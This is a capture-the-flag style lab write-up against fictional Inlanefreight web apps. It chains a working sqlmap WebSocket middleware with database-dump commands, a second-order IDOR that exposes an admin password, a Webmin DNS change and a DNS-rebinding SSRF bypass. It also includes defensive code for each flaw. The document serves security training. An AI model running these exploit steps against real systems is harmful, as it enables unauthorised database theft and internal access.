# Skills Assessment

## Scenario

Inlanefreight has contacted us to conduct an external penetration test against their web applications. They are launching a groundbreaking PDF creator.

### In-Scope Subdomains

| Target                      | Local Port |
| --------------------------- | ---------- |
| library.inlanefreight.local | 8001       |
| vault.inlanefreight.local   | 8002       |
| pdf.inlanefreight.local     | 8003       |
| webmin.inlanefreight.local  | 10000      |

> **Note:** Certain web applications only function properly with the corresponding local port value.

### Setup /etc/hosts

```bash
sudo tee -a /etc/hosts > /dev/null <<EOT
## inlanefreight hosts 
<Target_IP> library.inlanefreight.local vault.inlanefreight.local webmin.inlanefreight.local pdf.inlanefreight.local
EOT
```

***

## Question 1: Library Web Application Flag

### Vulnerability: WebSocket SQLi

1. Navigate to `library.inlanefreight.local:8001`
2. Search for user messages → Notice WebSocket connections in Burp
3. The username is sent as JSON to the `/dbconnector` WebSocket endpoint

### Exploitation

**Create sqlmap middleware:**

```python
from flask import Flask, request
from websocket import create_connection   # from the websocket-client package
import json

app = Flask(__name__)
WS_URL = 'ws://library.inlanefreight.local:8001/dbconnector'

@app.route('/')
def index():
    # Take the username from the HTTP query string (the value sqlmap mutates)
    # and forward it over the WebSocket in the JSON shape the app expects.
    req = {'username': request.args.get('username', '')}
    ws = create_connection(WS_URL)
    ws.send(json.dumps(req))
    r = json.loads(ws.recv())
    ws.close()
    # Relay any database error verbatim so sqlmap can detect error-based
    # injection; otherwise hand back the message list as the response body.
    if r.get('error'):
        return r['error']
    return r['messages']

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8000)
```

**Run middleware:**

```bash
python3 sqlmapMiddleware.py
```

**Confirm SQLi:**

```bash
sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --batch --threads=10
```

**Enumerate databases:**

```bash
sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --dbs --threads=10
```

**Enumerate tables:**

```bash
sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --tables -D db --threads=10
```

**Dump flag:**

```bash
sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' -T flag --dump --threads=10
```
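For the defender's side of this finding, here is an added example (not code from the page or from the Inlanefreight application) that contrasts the handler pattern making a JSON-over-WebSocket lookup injectable with its parameterised fix. The in-memory SQLite table is a constructed stand-in; the real backend uses a double-quoted string context (which is why `--prefix='"'` is needed), whereas SQLite's single-quoted literal is used here.

```python
import json
import sqlite3

def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the library's message store (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, message TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "Administrator User"), (2, "htb-stdnt", "HTB Staff User")],
    )
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, raw: str) -> list:
    """Handler pattern that makes a /dbconnector-style endpoint injectable:
    the JSON 'username' is spliced straight into the SQL string literal."""
    username = json.loads(raw)["username"]
    query = f"SELECT message FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]

def lookup_safe(conn: sqlite3.Connection, raw: str) -> list:
    """Same lookup with a bound parameter: the input is always data, never SQL."""
    username = json.loads(raw)["username"]
    query = "SELECT message FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]

if __name__ == "__main__":
    db = build_db()
    benign = json.dumps({"username": "htb-stdnt"})
    # Input that closes the literal early, the shape sqlmap's prefix option targets.
    tampered = json.dumps({"username": "' OR '1'='1"})
    print(lookup_vulnerable(db, benign))    # only the requested user's message
    print(lookup_vulnerable(db, tampered))  # every row leaks
    print(lookup_safe(db, tampered))        # nothing: no user has that literal name
```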

***

## Question 2: htb-stdnt Password

### Exploitation

Using the same middleware, dump the `users` table:

```bash
sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' -T users --dump --threads=10
```

**Result:**

```
+----+---------------------+--------------------+-----------+
| id | message             | password           | username  |
+----+---------------------+--------------------+-----------+
| 1  | Administrator User  | admin              | admin     |
| 2  |  HTB Staff User     | HTB_@cad3my_Stdnt! | htb-stdnt |
+----+---------------------+--------------------+-----------+
```

**Credentials:** `htb-stdnt:HTB_@cad3my_Stdnt!`

***

## Question 3: Vault Admin Password

### Vulnerability: Second-Order IDOR

1. Navigate to `vault.inlanefreight.local:8002`
2. Login with `htb-stdnt:HTB_@cad3my_Stdnt!`
3. Hover over "My Vault" → Notice URL parameter `id`

### Exploitation

1. Intercept the request that views the vault
2. Change the `id` value to `1` (admin's vault)
3. **Don't follow the redirect**
4. Refresh `/display_data.php` directly

**Result:** Admin's Webmin password: `AdM1N@v@uL1`
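An added example (not the vault application's code) modelling the two-request flow that makes this a second-order IDOR: the `id` is stored on the first request and only read back when `/display_data.php` renders, so the ownership check has to run at the point of use, not only at selection. Users, vault ids and the session dictionary are all constructed.

```python
# Constructed data and session handling; not the vault application's own code.
VAULTS = {
    1: {"owner": "admin", "data": "<admin vault contents>"},
    2: {"owner": "htb-stdnt", "data": "<htb-stdnt vault contents>"},
}

def select_vault_vulnerable(session: dict, vault_id: int) -> str:
    """Request 1 (view vault with ?id=N): stores the id and redirects. No ownership check."""
    session["vault_id"] = vault_id
    return "redirect:/display_data.php"

def display_data_vulnerable(session: dict) -> str:
    """Request 2 (/display_data.php): renders whatever id the session holds."""
    return VAULTS[session["vault_id"]]["data"]

def owns(session: dict, vault_id) -> bool:
    vault = VAULTS.get(vault_id)
    return vault is not None and vault["owner"] == session.get("user")

def select_vault_safe(session: dict, vault_id: int) -> str:
    if not owns(session, vault_id):
        raise PermissionError("vault %s is not owned by %s" % (vault_id, session.get("user")))
    session["vault_id"] = vault_id
    return "redirect:/display_data.php"

def display_data_safe(session: dict) -> str:
    """The stored id is user-influenced state, so ownership is re-checked where it is used."""
    vault_id = session.get("vault_id")
    if not owns(session, vault_id):
        raise PermissionError("stored vault id does not belong to the session user")
    return VAULTS[vault_id]["data"]

def run_flow(select, display, user: str, vault_id: int) -> str:
    """Drive both requests for one user; returns the rendered data or 'denied'."""
    session = {"user": user}
    try:
        select(session, vault_id)
        return display(session)
    except PermissionError:
        return "denied"
```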

***

## Question 4: PDF Application Flag

### Vulnerability: DNS Rebinding SSRF Bypass

The PDF app at `pdf.inlanefreight.local:8003` has SSRF filters blocking private IPs.

### Step 1: Access Webmin

Log in to `webmin.inlanefreight.local:10000` with `admin:AdM1N@v@uL1`

### Step 2: Change DNS Settings

Navigate to: `Networking → Network Configuration → Hostname and DNS Client`

Set DNS server to your tun0 IP:

```bash
ip -o -4 a show tun0 | cut -d " " -f 7
```

### Step 3: Setup DNSrebinder

```bash
git clone https://github.com/mogwailabs/DNSrebinder.git
cd DNSrebinder/
python3 -m venv DNSrebinder
source DNSrebinder/bin/activate
pip3 install -r requirements.txt
```

**Start rogue DNS server:**

```bash
sudo python3 dnsrebinder.py --domain google.com --ip 1.1.1.1 --rebind 127.0.0.1 --counter 1 --tcp --udp
```

### Step 4: Exploit

Visit `pdf.inlanefreight.local:8003` and request:

```
http://google.com:8003/flag
```

**DNS Rebinding Flow:**

1. First resolution (filter check): `google.com` → `1.1.1.1`, a public address, so the SSRF filter accepts the URL
2. Second resolution (when the renderer actually connects): `google.com` → `127.0.0.1`, so the request reaches localhost

**Result:** Flag displayed in generated PDF!
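An added example (not from the page or from DNSrebinder) of why a check-then-connect filter is bypassable and how to close it: a constructed resolver mimics `--counter 1` (one public answer, then `127.0.0.1`), a naive fetcher validates the name and lets the HTTP client resolve it again, and the pinned fetcher validates the single resolved address and connects to that address directly.

```python
import ipaddress
from typing import Callable

def is_disallowed(ip: str) -> bool:
    """Addresses an SSRF filter should refuse: loopback, RFC1918, link-local, etc."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def rebinding_resolver(first: str, then: str) -> Callable[[str], str]:
    """Constructed resolver mirroring dnsrebinder --counter 1: the first query
    is answered with `first`, every later query with `then`."""
    state = {"served": 0}
    def resolve(hostname: str) -> str:
        state["served"] += 1
        return first if state["served"] == 1 else then
    return resolve

def fetch_naive(resolve: Callable[[str], str], host: str) -> str:
    """Check-then-connect: validates one answer, then the HTTP client resolves
    the name again when connecting. Returns the address actually connected to."""
    if is_disallowed(resolve(host)):
        raise ValueError("blocked by SSRF filter")
    return resolve(host)          # second lookup: this is where rebinding lands

def fetch_pinned(resolve: Callable[[str], str], host: str) -> str:
    """Resolve once, validate that address, and connect to it directly while the
    original name travels in the Host header (and SNI); never re-resolve."""
    ip = resolve(host)
    if is_disallowed(ip):
        raise ValueError("blocked by SSRF filter")
    return ip

if __name__ == "__main__":
    print(fetch_naive(rebinding_resolver("1.1.1.1", "127.0.0.1"), "google.com"))   # 127.0.0.1
    print(fetch_pinned(rebinding_resolver("1.1.1.1", "127.0.0.1"), "google.com"))  # 1.1.1.1
```

The same per-hop check has to be applied to every redirect the fetcher follows, and DNS TTLs must be treated as untrusted since the rogue server chooses them.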

***

## Attack Chain Summary

```
┌─────────────────────────────────────────────────────────────────────────┐
│                    Skills Assessment Attack Flow                        │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  1. Library (WebSocket SQLi)                                            │
│     └── sqlmap middleware → dump flag table → get credentials           │
│                                                                         │
│  2. Vault (Second-Order IDOR)                                           │
│     └── Login with htb-stdnt creds                                      │
│     └── Change id=1, don't follow redirect → admin Webmin password      │
│                                                                         │
│  3. Webmin (DNS Configuration)                                          │
│     └── Login with admin creds                                          │
│     └── Point DNS to attacker's rogue DNS server                        │
│                                                                         │
│  4. PDF (DNS Rebinding)                                                 │
│     └── DNSrebinder: 1.1.1.1 → 127.0.0.1                                │
│     └── Request http://google.com:8003/flag → bypass SSRF → get flag    │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘
```
